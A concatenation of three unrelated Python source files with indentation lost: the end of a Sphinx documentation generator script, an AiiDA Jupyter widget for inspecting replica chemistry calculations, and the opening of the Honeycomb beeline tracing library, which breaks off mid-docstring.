argparser.add_argument('-o --output', type=str, help='directory into where Sphinx source files will be written', dest='outputdir', default='.')
argparser.add_argument('-v --verbose', action='store_true', default=False, dest='verbose_mode', help='Show warning and info messages')
args = argparser.parse_args()
loglevel = logging.INFO if args.verbose_mode else logging.ERROR
logging.basicConfig(format='%(levelname)s[%(name)s]: %(message)s', level=loglevel)
cProject = capi.Project()
cProject.initFromDir(args.xmldir)
cProject.check()
absApiParser = abstractapi.CParser(cProject)
absApiParser.parse_all()
docGenerator = DocGenerator(absApiParser)
docGenerator.generate(args.outputdir)
|
import ipywidgets as ipw
from IPython.display import display, clear_output, HTML
import nglview
import time
import ase.io
import ase.units as aseu
from ase.data.colors import jmol_colors
import urllib.parse
import numpy as np
import copy
import re
from collections import OrderedDict
import matplotlib.pyplot as plt
from pprint import pprint
from tempfile import NamedTemporaryFile
from base64 import b64encode
from aiida.orm.querybuilder import QueryBuilder
from aiida.orm import StructureData, Dict, WorkChainNode
from aiida.orm import load_node
from aiida.plugins import WorkflowFactory, CalculationFactory
from .collective_variables import COLVARS
style = {'description_width': '120px'}
layout = {'width': '70%'}
class SearchReplicaWidget(ipw.VBox):
def __init__(self, **kwargs):
self.preprocess_version = 0.16
btn_style = {'description_width': '60px'}
btn_layout = {'width': '20%'}
self.check_new_btn = ipw.Button(description="Check new calculations", style=btn_style, layout=btn_layout)
self.out_preproc = ipw.Output()
self.check_new_btn.on_click(lambda x: self.preprocess_replicas())
self.replica_calcs = None
self.drop_replica = ipw.Dropdown(options = [], description = 'Calculation:',
style=style, layout=layout)
self.parse_preprocessed_replica_calcs()
self.btn_show = ipw.Button(description="Show", style=btn_style, layout=btn_layout)
self.output_header = ipw.Output()
self.output_plot = ipw.Output()
self.output_thumbnails = ipw.Output()
self.output_checked_pks = ipw.Output()
self.btn_show.on_click(self.on_show_btn_click)
### ---------------------------------------------------------
### Define the ipw structure and create parent VBOX
children = [
self.check_new_btn,
self.out_preproc,
self.drop_replica,
self.btn_show,
self.output_header,
self.output_plot,
self.output_thumbnails,
self.output_checked_pks
]
super(SearchReplicaWidget, self).__init__(children=children, **kwargs)
### ---------------------------------------------------------
def parse_preprocessed_replica_calcs(self):
self.replica_calcs = self.parse_rep_wcs(self.get_replica_wcs(True))
options = OrderedDict(sorted([
(str(self.replica_calcs[key]['wcs'][0].ctime.date()) + " " + key, key) for key in self.replica_calcs.keys()
], reverse=True))
self.drop_replica.options = options
def on_show_btn_click(self, btn):
selected_replica_calc = self.replica_calcs[self.drop_replica.value]
self.order_replicas_by_cv_actual(selected_replica_calc)
html_list, check_list = self.generate_thumbnail_html(selected_replica_calc)
with self.output_header:
clear_output()
html = '<h2>{}</h2><br/> PK: '.format(self.drop_replica.value) + str([wc.pk for wc in selected_replica_calc['wcs']])
display(ipw.HTML(html))
with self.output_plot:
clear_output()
self.generate_energy_cv_plot(selected_replica_calc)
n_col = 4
layout = {'width':'%.1f%%' % (100.0/n_col)}
with self.output_thumbnails:
clear_output()
cur_row = []
for i, (html, cb) in enumerate(zip(html_list, check_list)):
cur_row.append(ipw.VBox([ipw.HTML(html), cb], layout=layout))
if (i+1) % n_col == 0:
display(ipw.HBox(cur_row))
cur_row = []
if len(cur_row) != 0:
display(ipw.HBox(cur_row))
self.print_checked_pk_list(selected_replica_calc, check_list)
def print_checked_pk_list(self, replica_calc, check_list):
list_of_pks = [rep[2] for rep in replica_calc['replicas']]
with self.output_checked_pks:
clear_output()
print("List of all replica PKs:")
rep_pk_str = "["
for pk, cb in zip(list_of_pks, check_list):
if cb.value:
rep_pk_str += "%d " % pk
print(rep_pk_str[:-1] + "]")
def generate_energy_cv_plot(self, replica_calc):
plot_energy_scf = []
plot_energy_frc = []
plot_colvar = []
wc_pk_str = str(replica_calc['wcs'][0].pk)
ref_en_scf = None
ref_en_frc = None
for i, rep in enumerate(replica_calc['replicas']):
cv_target, energy, struct_pk = rep
struct_node = load_node(struct_pk)
colvar_actual = struct_node.get_extra('replica_calcs')[wc_pk_str]['colvar_actual']
plot_energy_scf.append(energy[0])
plot_energy_frc.append(energy[1])
plot_colvar.append(colvar_actual)
if cv_target is None:
if ref_en_scf is None:
ref_en_scf = energy[0]*27.2114
ref_en_frc = energy[1]*27.2114
plot_energy_scf = np.array(plot_energy_scf)*27.2114
plot_energy_scf -= ref_en_scf
plot_energy_frc = np.array(plot_energy_frc)*27.2114
plot_energy_frc -= ref_en_frc
plt.figure(figsize=(10, 5))
plt.ylabel('Energy/eV')
plt.xlabel('Collective variable')
plt.plot(plot_colvar, plot_energy_scf, 'go-', label='SCF energy')
plt.plot(plot_colvar, plot_energy_frc, 'bo-', label='FORCE_EVAL energy')
for i, rep in enumerate(replica_calc['replicas']):
# if the replica has no cv_target and has energy, it's an initial one, paint as red
cv_target, energy, struct_pk = rep
if cv_target == None and energy is not None:
plt.plot(plot_colvar[i], plot_energy_scf[i], 'ro-')
plt.legend()
plt.grid()
plt.show()
def generate_thumbnail_html(self, replica_calc):
html_list = []
check_list = [] # check boxes to show in final pk list
colvar_type = list(replica_calc['colvar_def'].keys())[0] # 'DISTANCE', ...
wc_pk_str = str(replica_calc['wcs'][0].pk)
for i, rep in enumerate(replica_calc['replicas']):
cv_target, energy, struct_pk = rep
struct_node = load_node(struct_pk)
html = '<table style="border-spacing:20px 0px;border-collapse:separate;">'
struct_rep_info = struct_node.get_extra('replica_calcs')[wc_pk_str]
d2prev = struct_rep_info['dist_previous']
colvar_actual = float(struct_rep_info['colvar_actual'])
thumbnail = struct_rep_info['thumbnail']
cv_target_str = "-" if cv_target is None else "%.2f" % cv_target
energy_scf_str = "%.6f" % energy[0]
energy_frc_str = "%.6f" % energy[1]
colvar_actual_str = "%.4f" % colvar_actual
d2prev_str = "-" if d2prev == '-' else "%.4f" % float(d2prev)
check_me = ipw.Checkbox(
value=True,
description='select',
disabled=False,
layout=layout
)
check_me.observe(lambda x, rc=replica_calc, cl=check_list: self.print_checked_pk_list(rc, cl), 'value')
check_list.append(check_me)
html = '<img width="400px" src="data:image/png;base64,{}" title="">'.format(thumbnail)
html += '<table style="border-spacing:6px 0px;border-collapse:separate;">'
# Output some information about the replica...
html += '<tr><td align="left"><b>Target:</b></td><td align="right">{}</td></tr>'\
.format(cv_target_str)
html += '<tr><td align="left"><b>CV actual:</b></td><td align="right">{}</td></tr>'\
.format(colvar_actual_str)
html += '<tr><td align="left"><b>Energy (scf) /au:</b></td><td align="right">{}</td></tr>'\
.format(energy_scf_str)
html += '<tr><td align="left"><b>Energy (force) /au:</b></td><td align="right">{}</td></tr>'\
.format(energy_frc_str)
html += '<tr><td align="left"><b>dist to prev:</b></td><td align="right">{}</td></tr>'\
.format(d2prev_str)
html += '<tr><td align="left">pk: </td><td align="right">{}</td></tr>'\
.format(struct_node.pk)
# ... and the download link.
html += '<tr><td align="left"><a target="_blank" href="../export_structure.ipynb?uuid={}">View & export</a></td></tr>'\
.format(struct_node.uuid)
html += '</table>'
html_list.append(html)
return html_list, check_list
def get_replica_wcs(self, preprocessed = False):
qb = QueryBuilder()
if preprocessed:
qb.append(WorkChainNode, tag='wc', filters={
'attributes.process_label': 'ReplicaWorkChain',
'and':[
{'extras': {'has_key': 'preproc_v'}},
{'extras.preproc_v': {'==': self.preprocess_version}},
]
})
else:
qb.append(WorkChainNode, tag='wc', filters={
'attributes.process_label': 'ReplicaWorkChain',
'or':[
{'extras': {'!has_key': 'preproc_v'}},
{'extras.preproc_v': {'<': self.preprocess_version}},
]
})
qb.order_by({'wc': {'ctime': 'asc'}})
return qb.all()
def parse_rep_wcs(self, wc_list, existing_rep_sets=OrderedDict()):
replica_sets = OrderedDict()
rep_set_template = {
'replicas' : [], # (cv_target, (energy_scf, e_force_eval), StructureData.pk)
'wcs' : [],
'colvar_def' : None,
'colvar_inc' : None, # colvar increasing or decreasing ?
}
for wc_qb in wc_list:
wc = wc_qb[0]
# we also want to potentially recover replicas from an excepted calculation
#if wc.is_excepted:
# continue
if not wc.is_terminated:
print(str(wc.pk) + " is still running, skipping.")
continue
wc_out_names = list(wc.outputs)
if 'replica_0' not in wc_out_names and 'replica_00' not in wc_out_names:
continue
if 'params_0' not in wc_out_names and 'params_00' not in wc_out_names:
continue
name = wc.description
cv_def = dict(wc.inputs['subsys_colvar'])
cv_targets = [float(cvt) for cvt in wc.inputs['colvar_targets'].value.split()]
# NB: there is no colvar target for replica_0 as that is the initial geometry
cv_targets = [None] + cv_targets
cv_inc = cv_targets[2] > cv_targets[1]
energies = [(wc.outputs[o]['energy_scf'], wc.outputs[o]['energy_force'])
for o in sorted(wc.outputs) if o.startswith('params_')]
num_replicas = len([n for n in wc_out_names if n.startswith('replica')])
if num_replicas != len(cv_targets):
cv_targets = cv_targets[:num_replicas]
if name not in replica_sets:
if name in existing_rep_sets:
# Already had a preprocessed part, add it
replica_sets[name] = copy.copy(existing_rep_sets[name])
else:
# New replica set
replica_sets[name] = copy.deepcopy(rep_set_template)
replica_sets[name]['colvar_def'] = cv_def
replica_sets[name]['colvar_inc'] = cv_inc
# Does the current wc match with the replica set?
if replica_sets[name]['colvar_def'] != cv_def or replica_sets[name]['colvar_inc'] != cv_inc:
print("----")
print("Warning! Replica calc CV definition doesn't match with previous ones.")
print("Existing: %s %s" % (str([w.pk for w in replica_sets[name]['wcs']]),
"cv_def: %s, cv_inc: %s" %(str(replica_sets[name]['colvar_def']),
str(replica_sets[name]['colvar_inc']))))
print("Skipping: %s %s " % (str(wc.pk), "cv_def: %s, cv_inc: %s" %(str(cv_def),
str(cv_inc))))
print("----")
continue
# add it to the set
replica_sets[name]['wcs'].append(wc)
wc_replica_list = []
for wc_o in sorted(list(wc.outputs)):
if wc_o.startswith("replica_"):
struct = wc.outputs[wc_o]
# add description, if it doesn't exist already
if struct.description == "":
if struct.creator is None:
struct.description = "-"
else:
struct.description = struct.creator.description
wc_replica_list.append(wc.outputs[wc_o])
# Add the replicas of this wc to the set if it doesn't exist there already
# (e.g. in case of continuation from another wc)
for i_rep in range(len(wc_replica_list)):
if wc_replica_list[i_rep].pk not in [s[2] for s in replica_sets[name]['replicas']]:
replica = (cv_targets[i_rep], energies[i_rep], wc_replica_list[i_rep].pk)
replica_sets[name]['replicas'].append(replica)
# Sort entries by cv target (e.g. one could be adding replicas in-between prev calculated ones)
#if cv_inc:
# replica_sets[name]['replicas'].sort(key=lambda x:(x[0] is not None, x[0], x[2]))
#else:
# replica_sets[name]['replicas'].sort(reverse=True, key=lambda x:(x[0] is None, x[0], x[2]))
return replica_sets
def get_replica_distance(self, s1, s2):
a1 = s1.get_positions()
a2 = s2.get_positions()
return np.linalg.norm(a1-a2)
def render_thumbnail(self, atoms, vis_list=None):
colors = None
if vis_list:
vis_list_atoms = [e for e in vis_list if isinstance(e, int)]
colors = jmol_colors[atoms.numbers]
for i_at in vis_list_atoms:
colors[i_at] *= 0.6
colors[i_at][0] = 1.0
tmp = NamedTemporaryFile()
ase.io.write(tmp.name, atoms, format='png', colors=colors) # does not accept StringIO
raw = open(tmp.name, 'rb').read()
tmp.close()
return b64encode(raw).decode()
def order_replicas_by_cv_actual(self, replica_calc):
wc_pk_str = str(replica_calc['wcs'][0].pk)
cv_actual_list = []
for i, rep in enumerate(replica_calc['replicas']):
cv_target, energy, struct_pk = rep
struct_node = load_node(struct_pk)
struct_rep_info = struct_node.get_extra('replica_calcs')[wc_pk_str]
colvar_actual = float(struct_rep_info['colvar_actual'])
cv_actual_list.append(colvar_actual)
sorted_lists = list(zip(*sorted(zip(cv_actual_list, replica_calc['replicas']),
reverse=not replica_calc['colvar_inc'])))
cv_actual_list = list(sorted_lists[0])
replica_calc['replicas'] = list(sorted_lists[1])
def preprocess(self, replica_calc, overwrite_thumbnails=False):
# Find all PKs of all work-calcs that contributed to this set
print("wc pk: " + str([wc.pk for wc in replica_calc['wcs']]))
progress = ipw.FloatProgress(description='Parsing images...', min=0, max=1, value=0.,
style=style, layout=layout)
display(progress)
wc_preproc_failed = False
n_rep = len(replica_calc['replicas'])
# Set up the collective variable instance for evaluation
colvar_type = list(replica_calc['colvar_def'].keys())[0]
cv_instance = COLVARS[colvar_type].from_cp2k_subsys(replica_calc['colvar_def'])
# -----------------------------------------------------------
# Get the list of ase and actual colvar values for each replica
ase_list = []
cv_actual_list = []
for i, rep in enumerate(replica_calc['replicas']):
cv_target, energy, struct_pk = rep
struct = load_node(struct_pk)
progress.value += (i+1.)/(2*n_rep)
struct_ase = struct.get_ase()
colvar_actual = cv_instance.eval_cv(struct_ase)
ase_list.append(struct_ase)
cv_actual_list.append(colvar_actual)
# -----------------------------------------------------------
# Sort the order of replicas by colvar actual
sorted_lists = zip(*sorted(zip(cv_actual_list, ase_list, replica_calc['replicas']),
reverse=not replica_calc['colvar_inc']))
cv_actual_list, ase_list, replica_calc['replicas'] = sorted_lists
# -----------------------------------------------------------
# calculate the dist to prev and update extras
for i, rep in enumerate(replica_calc['replicas']):
cv_target, energy, struct_pk = rep
struct = load_node(struct_pk)
cv_actual = cv_actual_list[i]
struct_ase = ase_list[i]
progress.value += (i+1.)/(2*n_rep)
if i == 0:
dist_previous = '-'
else:
dist_previous = self.get_replica_distance(ase_list[i-1], struct_ase)
# Update the extras of the current structure
wc_pk_str = str(replica_calc['wcs'][0].pk)
if 'replica_calcs' not in list(struct.extras):
struct.set_extra('replica_calcs', {})
rep_calcs = struct.extras['replica_calcs']
if wc_pk_str not in rep_calcs:
rep_calcs[wc_pk_str] = {}
rep_calcs[wc_pk_str]['preproc_v'] = self.preprocess_version
rep_calcs[wc_pk_str]['dist_previous'] = dist_previous
rep_calcs[wc_pk_str]['colvar_actual'] = cv_actual
if 'thumbnail' not in rep_calcs[wc_pk_str] or overwrite_thumbnails:
t = struct_ase
vis_list = cv_instance.visualization_list(t)
thumbnail = self.render_thumbnail(t, vis_list)
rep_calcs[wc_pk_str]['thumbnail'] = thumbnail
struct.set_extra('replica_calcs', rep_calcs)
# -----------------------------------------------------------
for wc in replica_calc['wcs']:
wc.set_extra('preproc_v', self.preprocess_version)
wc.set_extra('preproc_failed', wc_preproc_failed)
def preprocess_replicas(self):
with self.out_preproc:
print('Retrieving unparsed replica calculations...')
reps_not_preproc = self.parse_rep_wcs(self.get_replica_wcs(False), existing_rep_sets=self.replica_calcs)
print('Preprocessing {} replicas...'.format(len(reps_not_preproc.keys())))
for i, k in enumerate(reps_not_preproc.keys()):
with self.out_preproc:
print('{}: {}/{}'.format(k, i+1, len(reps_not_preproc.keys())))
self.preprocess(reps_not_preproc[k])
with self.out_preproc:
print('Done!')
self.parse_preprocessed_replica_calcs()
|
<filename>beeline/__init__.py<gh_stars>0
''' module beeline '''
import functools
import logging
import os
import socket
from contextlib import contextmanager
from libhoney import Client
from beeline.trace import SynchronousTracer
from beeline.version import VERSION
from beeline import internal
import beeline.propagation.default
import sys
# pyflakes
assert internal
USER_AGENT_ADDITION = "beeline-python/%s" % VERSION
# This is the global beeline created by init
_GBL = None
# This is the PID that initialized the beeline.
_INITPID = None
try:
import asyncio
try:
asyncio.get_running_loop() # pylint: disable=no-member
except RuntimeError:
pass
from beeline.aiotrace import AsyncioTracer, traced_impl, untraced
assert untraced
def in_async_code():
"""Return whether we are running inside an asynchronous task.
We use this information to determine which tracer
implementation to use.
"""
try:
asyncio.get_running_loop() # pylint: disable=no-member
return True
except RuntimeError:
return False
except (ImportError, AttributeError):
# Use these non-async versions if we don't have asyncio.
from beeline.trace import traced_impl
def in_async_code():
return False
class Beeline(object):
def __init__(self,
writekey='', dataset='', service_name='',
tracer=None, sample_rate=1, api_host='https://api.honeycomb.io',
max_concurrent_batches=10, max_batch_size=100, send_frequency=0.25,
block_on_send=False, block_on_response=False,
transmission_impl=None, sampler_hook=None, presend_hook=None,
http_trace_parser_hook=beeline.propagation.default.http_trace_parser_hook,
http_trace_propagation_hook=beeline.propagation.default.http_trace_propagation_hook,
debug=False):
self.client = None
self.tracer_impl = None
self.presend_hook = None
self.sampler_hook = None
self.http_trace_parser_hook = None
self.http_trace_propagation_hook = None
self.debug = debug
if debug:
self._init_logger()
# allow setting some values from the environment
if not writekey:
writekey = os.environ.get('HONEYCOMB_WRITEKEY', '')
if not dataset:
dataset = os.environ.get('HONEYCOMB_DATASET', '')
if not service_name:
service_name = os.environ.get('HONEYCOMB_SERVICE', dataset)
self.client = Client(
writekey=writekey, dataset=dataset, sample_rate=sample_rate,
api_host=api_host, max_concurrent_batches=max_concurrent_batches,
max_batch_size=max_batch_size, send_frequency=send_frequency,
block_on_send=block_on_send, block_on_response=block_on_response,
transmission_impl=transmission_impl,
user_agent_addition=USER_AGENT_ADDITION,
debug=debug,
)
self.log('initialized honeycomb client: writekey=%s dataset=%s service_name=%s',
writekey, dataset, service_name)
if not writekey:
self.log(
'writekey not set! set the writekey if you want to send data to honeycomb')
if not dataset:
self.log(
'dataset not set! set a value for dataset if you want to send data to honeycomb')
self.client.add_field('service_name', service_name)
self.client.add_field('meta.beeline_version', VERSION)
self.client.add_field('meta.local_hostname', socket.gethostname())
if in_async_code():
self.tracer_impl = AsyncioTracer(self.client)
else:
self.tracer_impl = SynchronousTracer(self.client)
self.tracer_impl.register_hooks(
presend=presend_hook,
sampler=sampler_hook,
http_trace_parser=http_trace_parser_hook,
http_trace_propagation=http_trace_propagation_hook)
self.sampler_hook = sampler_hook
self.presend_hook = presend_hook
self.http_trace_parser_hook = http_trace_parser_hook
self.http_trace_propagation_hook = http_trace_propagation_hook
def send_now(self, data):
''' DEPRECATED - to be removed in a future release
Create an event and enqueue it immediately. Does not work with
`beeline.add_field` - this is equivalent to calling `libhoney.send_now`
'''
ev = self.client.new_event()
if data:
ev.add(data)
self._run_hooks_and_send(ev)
def add_field(self, name, value):
''' Add a field to the currently active span.
`beeline.add_field("my field", "my value")`
If a field is being attributed to the wrong span/event,
make sure that `new_event` and `close_event` calls are matched.
'''
# fetch the current event from our tracer
span = self.tracer_impl.get_active_span()
# if there are no spans, this is a noop
if span is None:
return
span.add_context_field(name, value)
def add(self, data):
'''Similar to add_field(), but allows you to add a number of name:value pairs
to the currently active event at the same time.
`beeline.add({ "first_field": "a", "second_field": "b"})`
'''
# fetch the current event from the tracer
span = self.tracer_impl.get_active_span()
# if there are no spans, this is a noop
if span is None:
return
span.add_context(data)
def tracer(self, name, trace_id=None, parent_id=None):
return self.tracer_impl(name=name, trace_id=trace_id, parent_id=parent_id)
def new_event(self, data=None, trace_name=''):
''' DEPRECATED: Helper method that wraps `start_trace` and
`start_span`. It is better to use these methods as it provides
better control and context around how traces are implemented in your
app.
Creates a new span, populating it with the given data if
supplied. If no trace is running, a new trace will be started,
otherwise the event will be added as a span of the existing trace.
To send the event, call `beeline.send_event()`. There should be a
`send_event()` for each call to `new_event()`, or tracing and
`add` and `add_field` will not work correctly.
If trace_name is specified, will set the "name" field of the current span,
which is used in the trace visualizer.
'''
if trace_name:
data['name'] = trace_name
if self.tracer_impl.get_active_trace_id():
self.tracer_impl.start_span(context=data)
else:
self.tracer_impl.start_trace(context=data)
def send_event(self):
''' DEPRECATED: Sends the currently active event (current span),
if it exists.
There must be one call to `send_event` for each call to `new_event`.
'''
span = self.tracer_impl.get_active_span()
if span:
if span.is_root():
self.tracer_impl.finish_trace(span)
return
self.tracer_impl.finish_span(span)
def send_all(self):
''' send all spans in the trace stack, regardless of their
state
'''
span = self.tracer_impl.get_active_span()
while span:
if span.is_root():
self.tracer_impl.finish_trace(span)
return
self.tracer_impl.finish_span(span)
span = self.tracer_impl.get_active_span()
def traced(self, name, trace_id=None, parent_id=None):
return traced_impl(tracer_fn=self.tracer, name=name, trace_id=trace_id, parent_id=parent_id)
def traced_thread(self, fn):
trace_copy = self.tracer_impl._trace.copy()
@functools.wraps(fn)
def wrapped(*args, **kwargs):
self.tracer_impl._trace = trace_copy
return fn(*args, **kwargs)
return wrapped
def _run_hooks_and_send(self, ev):
''' internal - run any defined hooks on the event and send '''
presampled = False
if self.sampler_hook:
self.log("executing sampler hook on event ev = %s", ev.fields())
keep, new_rate = self.sampler_hook(ev.fields())
if not keep:
self.log(
"skipping event due to sampler hook sampling ev = %s", ev.fields())
return
ev.sample_rate = new_rate
presampled = True
if self.presend_hook:
self.log("executing presend hook on event ev = %s", ev.fields())
self.presend_hook(ev.fields())
if presampled:
self.log("enqueuing presampled event ev = %s", ev.fields())
ev.send_presampled()
else:
self.log("enqueuing event ev = %s", ev.fields())
ev.send()
def _init_logger(self):
self._logger = logging.getLogger('honeycomb-beeline')
self._logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
self._logger.addHandler(ch)
def log(self, msg, *args, **kwargs):
if self.debug:
self._logger.debug(msg, *args, **kwargs)
def get_responses_queue(self):
return self.client.responses()
def close(self):
if self.client:
self.client.close()
def init(writekey='', dataset='', service_name='', tracer=None,
sample_rate=1, api_host='https://api.honeycomb.io', transmission_impl=None,
sampler_hook=None, presend_hook=None, debug=False, *args, **kwargs):
''' initialize the honeycomb beeline. This will initialize a libhoney
client local to this module, and a tracer to track traces and spans.
Args:
- `writekey`: the authorization key for your team on Honeycomb. Find your team
write key at [https://ui.honeycomb.io/account](https://ui.honeycomb.io/account)
- `dataset`: the name of the default dataset to which to write
- `sample_rate`: the default sample rate. 1 / `sample_rate` events will be sent.
- `transmission_impl`: if set, override the default transmission implementation
(for example, TornadoTransmission)
- `sampler_hook`: accepts a function to be called just before each event is sent.
The function should accept a dictionary of event fields, and return a tuple
of type (bool, int). The first item indicates whether or not the event
should be sent, and the second indicates the updated sample rate to use.
- `presend_hook`: accepts a function to be called just before each event is sent.
The functon should accept a dictionary of event fields, and can be used
to add new fields, modify/scrub existing fields, or drop fields. This
function is called after sampler_hook, if sampler_hook is set.
If in doubt, just set `writekey` and `dataset` and move on!
'''
global _GBL
global _INITPID
pid = os.getpid()
if _GBL:
if pid == _INITPID:
_GBL.log("beeline already initialized! skipping initialization")
return
_GBL.log("beeline already initialized, but process ID has changed (was {}, now {}). Reinitializing.".format(
_INITPID, pid))
_GBL.close()
_GBL = Beeline(
writekey=writekey, dataset=dataset, sample_rate=sample_rate,
api_host=api_host, transmission_impl=transmission_impl,
debug=debug, presend_hook=presend_hook, sampler_hook=sampler_hook,
service_name=service_name,
# since we've simplified the init function signature a bit,
# pass on other args for backwards compatibility
*args, **kwargs
)
# Store the PID that initialized the beeline globally. If the beeline was initialized in another
# process that was later forked, we can use this to detect it and reinitialize the client (and the transmission
# thread).
_INITPID = pid
def send_now(data):
''' Create an event and enqueue it immediately. Does not work with
`beeline.add_field` - this is equivalent to calling `libhoney.send_now`
Args:
- `data`: dictionary of field names (strings) to field values to include
in the event
'''
# no-op if we're not initialized
bl = get_beeline()
if bl:
bl.send_now(data)
def add_field(name, value):
''' DEPRECATED: use `add_context_field`
Args:
- `data`: dictionary of field names (strings) to field values to add
'''
if _GBL:
_GBL.add_field(name, value)
def add(data):
'''DEPRECATED: use `add_context`
Args:
- `data`: dictionary of field names (strings) to field values to add
'''
bl = get_beeline()
if bl:
bl.add(data)
def add_context(data):
'''Similar to add_context_field(), but allows you to add a number of name:value pairs
to the currently active event at the same time.
`beeline.add_context({ "first_field": "a", "second_field": "b"})`
Args:
- `data`: dictionary of field names (strings) to field values to add
'''
bl = get_beeline()
if bl:
bl.tracer_impl.add_context(data=data)
def add_context_field(name, value):
''' Add a field to the currently active span. For example, if you are
using django and wish to add additional context to the current request
before it is sent to Honeycomb:
`beeline.add_context_field("my field", "my value")`
Args:
- `name`: Name of field to add
- `value`: Value of new field
'''
bl = get_beeline()
if bl:
bl.tracer_impl.add_context_field(name=name, value=value)
def remove_context_field(name):
''' Remove a single field from the current span.
```
beeline.add_context({ "first_field": "a", "second_field": "b"})
beeline.remove_context_field("second_field")
Args:
- `name`: Name of field to remove
```
'''
bl = get_beeline()
if bl:
bl.tracer_impl.remove_context_field(name=name)
def add_rollup_field(name, value):
''' AddRollupField adds a key/value pair to the current span. If it is called repeatedly
on the same span, the values will be summed together. Additionally, this
field will be summed across all spans and added to the trace as a total. It
is especially useful for doing things like adding the duration spent talking
to a specific external service - eg database time. The root span will then
get a field that represents the total time spent talking to the database from
all of the spans that are part of the trace.
Args:
- `name`: Name of field to add
- `value`: Numeric (float) value of new field
'''
bl = get_beeline()
if bl:
bl.tracer_impl.add_rollup_field(name=name, value=value)
def add_trace_field(name, value):
''' Similar to `add_context_field` - adds a field to the current span, but
also to all other future spans in this trace. Trace context fields will be
propagated to downstream services if using instrumented libraries
like `requests`.
Args:
- `name`: Name of field to add
- `value`: Value of new field
'''
bl = get_beeline()
if bl:
bl.tracer_impl.add_trace_field(name=name, value=value)
def remove_trace_field(name):
''' Removes a trace context field from the current span. This will not
affect other existing spans, but will prevent the field from being
propagated to new spans.
Args:
- `name`: Name of field to remove
'''
bl = get_beeline()
if bl:
bl.tracer_impl.remove_trace_field(name=name)
def tracer(name, trace_id=None, parent_id=None):
'''
When used in a context manager, creates a span for the contained
code. If a trace is ongoing, will add a new child span under the currently
running span. If no trace is ongoing, will start a new trace.
Example use:
```
with tracer(name="my expensive computation"):
recursive_fib(100)
```
Args:
- `name`: a descriptive name for the this trace span, i.e. "database query for user"
- `trace_id`: the trace_id to use. If None, will be automatically generated if no
current trace is ongoing. Use this if you want to explicitly resume a trace
in this application that was initiated in another application, and you have
the upstream trace_id.
- `parent_id`: If trace_id is set, will populate the root span's parent
with this id.
'''
bl = get_beeline()
if bl:
return bl.tracer(name=name, trace_id=trace_id, parent_id=parent_id)
# if the beeline is not initialized, build a dummy function
# that will work as a context manager and call that
@contextmanager
def _noop_cm():
yield
return _noop_cm()
def start_trace(context=None, trace_id=None, parent_span_id=None):
'''
Start a trace, returning the root span. To finish the trace, pass the span
to `finish_trace`. `start_trace` does not propagate contexts - if you wish
to propagate contexts from sources such as HTTP headers, use `propagate_and_start_trace`
instead. If you are using the beeline middleware plugins, such as fordjango,
flask, or AWS lambda, you will want to use `start_span` instead, as `start_trace`
is called at the start of the request.
Args:
- `context`: optional dictionary of event fields to populate the root span with
- `trace_id`: the trace_id to use. If None, will be automatically generated.
Use this if you want to explicitly resume trace in this application that was
initiated in another application, and you have the upstream trace_id.
- `parent_span_id`: If trace_id is set, will populate the root span's parent
with this id.
'''
bl = get_beeline()
if bl:
return bl.tracer_impl.start_trace(context=context, trace_id=trace_id, parent_span_id=parent_span_id)
def finish_trace(span):
''' Explicitly finish a trace. If you started a trace with `start_trace`, you must call
this to close the trace and send the root span. If you are using the beeline middleware plugins,
such as django, flask, or AWS lambda, you can skip this step as the trace will be closed for
you.
Args:
- `span`: Span object that was returned by `start_trace`
'''
bl = get_beeline()
if bl:
bl.tracer_impl.finish_trace(span=span)
def start_span(context=None, parent_id=None):
'''
Start a new span and return the span object. Returns None if no trace is active.
For each `start_span`, there should be one call to `close_span`. Child spans should
also be closed before parent spans. Closing spans out of order will lead to strange
results and can break the bookkeeping needed to preserve trace structure. For example:
```
parent_span = beeline.start_span()
# this span is a child of the last span created
child_span = beeline.start_span()
beeline.finish_span(child_span)
beeline.finish_span(parent_span)
```
Args:
- `context`: optional dictionary of event fields to populate the span with
- `parent_id`: ID of parent span - use this only if you have a very good reason to
do so.
'''
bl = get_beeline()
if bl:
return bl.tracer_impl.start_span(context=context, parent_id=parent_id)
def finish_span(span):
'''
Finish the provided span, sending the associated event data to Honeycomb.
For each `start_span`, there should be one call to `finish_span`.
Args:
- `span`: Span object that was returned by `start_trace`
'''
bl = get_beeline()
if bl:
bl.tracer_impl.finish_span(span=span)
def propagate_and_start_trace(context, request):
'''
Given context and a beeline.propagation.Request subclass, calls the header_parse hooks
to propagate information from the incoming http (or similar) request context,
returning a new trace using that information if it exists.
'''
bl = get_beeline()
if bl:
return bl.tracer_impl.propagate_and_start_trace(context, request)
return None
def http_trace_parser_hook(headers):
'''
Given headers, calls the header_parse hooks to propagate information from the
incoming http (or similar) request context, returning a new trace using that
information if it exists.
'''
bl = get_beeline()
if bl:
return bl.tracer_impl.http_trace_parser_hook(headers)
return None
def http_trace_propagation_hook():
'''
Given headers, calls the header_parse hooks to propagate information from the
incoming http (or similar) request context, returning a new trace using that
information if it exists.
'''
bl = get_beeline()
if bl:
try:
return bl.tracer_impl.http_trace_propagation_hook(bl.tracer_impl.get_propagation_context())
except Exception:
err = sys.exc_info()
bl.log('error: http_trace_propagation_hook returned exception: %s', err)
return None
def marshal_trace_context():
'''
DEPRECATED: Returns a serialized form of the current trace context (including the trace
id and the current span), encoded as a string. You can use this to propagate
trace context to other services.
Use `beeline.propagation.honeycomb` functions to work with honeycomb trace context instead.
Example:
```
trace_context = beeline.marshal_trace_context()
headers = {'X-Honeycomb-Trace': trace_context}
requests.get("http://...", headers=headers)
```
'''
bl = get_beeline()
if bl:
return bl.tracer_impl.marshal_trace_context()
return None
def new_event(data=None, trace_name=''):
''' DEPRECATED: Helper method that wraps `start_trace` and
`start_span`. It is better to use these methods as it provides
better control and context around how traces are implemented in your
app.
Creates a new span, populating it with the given data if
supplied. If no trace is running, a new trace will be started,
otherwise the event will be added as a span of the existing trace.
To send the event, call `beeline.send_event()`. There should be a
`send_event()` for each call to `new_event()`, or tracing and
`add` and `add_field` will not work correctly.
If trace_name is specified, will set the "name" field of the current span,
which is used in the trace visualizer.
'''
bl = get_beeline()
if bl:
bl.new_event(data=data, trace_name=trace_name)
def send_event():
''' DEPRECATED: Sends the currently active event (current span),
if it exists.
There must be one call to `send_event` for each call to `new_event`.
'''
bl = get_beeline()
if bl:
bl.send_event()
def send_all():
''' send all spans in the trace stack, regardless of their
state. You might use this in a catch-all error handler
along with `beeline.close()` to send all events before the program
